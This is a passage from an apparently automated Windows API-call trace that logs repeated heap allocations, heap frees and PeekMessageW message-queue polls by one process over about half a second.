lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0134.081] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0134.081] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0134.082] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0134.082] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.082] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0134.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0134.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0134.083] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0134.083] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0134.083] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0134.084] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0134.084] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0134.084] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0134.085] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0134.085] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0134.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0134.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0134.085] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0134.086] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0134.086] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0134.086] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0134.159] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0134.159] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0134.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.159] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0134.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0134.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0134.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0134.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0134.160] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0134.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0134.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0134.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0134.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0134.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0134.161] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0134.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0134.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0134.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0134.162] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0134.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0134.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0134.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0134.163] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0134.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0134.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0134.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0134.164] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.164] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0134.165] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0134.165] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0134.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0134.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0134.165] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0134.568] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0134.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0134.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0134.568] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0134.569] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0134.569] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0134.569] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 